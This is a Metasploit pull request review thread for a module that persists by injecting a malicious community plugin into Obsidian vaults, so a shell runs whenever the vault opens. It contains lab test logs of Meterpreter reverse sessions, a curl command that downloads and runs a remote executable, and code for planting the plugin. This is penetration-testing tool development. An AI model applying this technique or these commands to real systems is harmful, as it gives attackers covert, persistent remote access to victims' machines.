obsidian community plugin persistence module #19698
Conversation
h00die
changed the title
There was a problem hiding this comment.
Thanks for the module @h00die! A couple minor comments. I was able to get the module working on both Windows and Ubuntu:
msf6 exploit(multi/local/obsidian_plugin_persistence) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 172.16.199.1:4747
[*] Using plugin name: heFg
[+] Found open vault a3c85fece5bc4754: /home/msfuser/Documents/Obsidian Vault
[+] Found open vault 0b89f4384029f5e5: /home/msfuser/Documents/Obsidian Vault/test
[*] Uploading plugin to vault /home/msfuser/Documents/Obsidian Vault
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Uploading plugin to vault /home/msfuser/Documents/Obsidian Vault/test
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Sending stage (3045380 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4747 -> 172.16.199.135:50644) at 2024-12-10 09:51:58 -0800
meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo\
> Interrupt: use the 'exit' command to quit
meterpreter > sysinfo
Computer : 172.16.199.135
OS : Ubuntu 22.04 (Linux 6.8.0-49-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
msf6 exploit(multi/local/obsidian_plugin_persistence) > run
[*] Command to run on remote host: curl -so %TEMP%\MWepEBBdLa.exe http://172.16.199.1:8080/_tdKmkFueHIFyaHmed_EsQ & start /B %TEMP%\MWepEBBdLa.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /_tdKmkFueHIFyaHmed_EsQ
[*] Started reverse TCP handler on 172.16.199.1:9494
[*] Using plugin name: gJ3hDuF
[*] Target User: msfsuer
[*] Found user obsidian file: C:\Users\msfsuer\AppData\Roaming\obsidian\obsidian.json
[+] Found open vault 4a64d0cad62c57e8: C:\Users\msfsuer\Documents\test
[*] Uploading plugin to vault C:\Users\msfsuer\Documents\test
[*] Uploading: C:\Users\msfsuer\Documents\test/.obsidian/plugins/gJ3hDuF/main.js
[*] Uploading: C:\Users\msfsuer\Documents\test/.obsidian/plugins/gJ3hDuF/manifest.json
[*] Found 9 enabled community plugins (JjzmylLVr, U24sEX, XnIUKw3j6, WZv6jwbIB, ZopQa, UnLc0Xt, 8N639, DH9fw7, YFvM)
[*] adding gJ3hDuF to the enabled community plugins list
[+] Plugin enabled, waiting for Obsidian to open the vault and execute the plugin.
[*] Client 172.16.199.132 requested /_tdKmkFueHIFyaHmed_EsQ
[*] Sending payload to 172.16.199.132 (curl/8.0.1)
[*] Sending stage (203846 bytes) to 172.16.199.132
[*] Meterpreter session 4 opened (172.16.199.1:9494 -> 172.16.199.132:51302) at 2024-12-10 11:02:54 -0800
meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfsuer
meterpreter > sysinfo
Computer : DESKTOP-0OPTL76
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > cd
|
All changes pushed, retested on linux and working. |
| # avoid mkdir function because that registers it for delete, and we don't want that for | ||
| # persistent modules | ||
| if ['windows', 'win'].include? session.platform | ||
| cmd_exec("cmd.exe /c md \"#{vault['path']}\\.obsidian\\plugins\\#{plugin}\"") |
There was a problem hiding this comment.
Framework has an API for executing things properly, such as handling quotes, spaces etc.
This will break if the path contains quotes or spaces.
mkdir is the method to use in this case.
There was a problem hiding this comment.
Sync'ing up on this one, it looks like the scenario of handling win/windows isn't handled
metasploit-framework/lib/msf/core/post/file.rb
Lines 121 to 137 in 2355ab5
Would have to double check if we still have session types with win and windows in framework, as I can't remember if we standardised the code so that it only appears as windows nowadays or not
There was a problem hiding this comment.
Per comment on 210, I don't want to use the framework API because of
. As a persistence module I don't want my shell to delete itself after first use.Also, and I may be mistaken, I believe
and https://github.com/rapid7/metasploit-framework/pull/19698/files#diff-37f24615bc7a6a803221bc0018be9f72e9130733a7d2c8970736fb590c5f5cadR213 are functionally equivalent since I escaped with quotes already? Maybe they're cancelled out bycmd.exe /c, unsure.
There was a problem hiding this comment.
That's an unexpected API for sure; not a blocker to this PR - will start a different PR to change that default behavior 😄
There was a problem hiding this comment.
I think adding a function flag defaulting to true to delete should be fine. keeps default behavior, but allows the override for cases like this
| 'Platform' => %w[osx linux windows], | ||
| 'DefaultOptions' => { | ||
| # 25hrs, you know, just in case the user doesn't open Obsidian for a while | ||
| 'WfsDelay' => 90_000, |
There was a problem hiding this comment.
Waiting 25 hours sounds a bit excessive, perhaps make this a passive module?
There was a problem hiding this comment.
I agree, however adding 'Stance' => Msf::Exploit::Stance::Passive, doesn't make it go background. Not sure if there's a regression somewhere, or it doesn't work with Msf::Exploit::Local
There was a problem hiding this comment.
I actually ran in to this before but didn't feel like dealing with it.
|
Got this tested on windows again, working! |
This PR adds a new persistence module by making a community plugin for Obsidian, and attaching it to the user's vault. Each time the user opens the vault, a shell executes.
I coded in OSX, but only tested against Windows and Linux.
Verification
List the steps needed to make sure this thing works
use multi/local/obsidian_plugin_persistencerun